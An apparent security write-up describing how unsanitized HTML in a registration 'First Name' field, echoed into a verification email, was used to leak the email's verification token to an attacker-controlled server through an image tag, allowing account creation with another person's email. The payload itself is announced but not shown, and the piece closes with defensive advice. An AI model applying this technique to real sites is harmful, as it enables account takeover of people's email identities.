How I Leveraged HTML Injection to Create an Account Using Someone Else’s Email

Step 1: Understanding the Registration Process

My journey began with an in-depth analysis of the registration process on a web application that required users to provide their email addresses for account creation. Upon registration, the application sent a verification email to the provided address, which included a unique verification link. The email contained a greeting that dynamically incorporated the user’s first name, allowing for potential HTML injection.

Step 2: Discovering the HTML Injection Vulnerability

While exploring the registration form, I noticed that the application did not properly sanitize the input in the “First Name” field. This oversight allowed me to inject HTML code into the field, which would subsequently appear in the verification email. I tested various payloads to see how they would render in the email.

After several attempts, I found that the application was interpreting {token} as a placeholder, and this format successfully injected the token into my crafted HTML.

Step 3: Constructing the Payload to Capture the Verification Token

With {token} now reflecting the verification token in the email, I moved on to crafting a payload that would transmit this token to a server I controlled. I used the following injection in the first name field to achieve this:

When the email was rendered, this payload embedded an image tag with a source URL pointing to my server, using {token} as part of the query string. This allowed the verification token to be sent directly to my server as soon as the email was opened.

Conclusion

This vulnerability demonstrates how seemingly minor HTML injection issues can have significant security implications. By sanitizing and encoding dynamic input fields, especially in sensitive processes like email verification, organizations can prevent malicious actors from exploiting these weaknesses.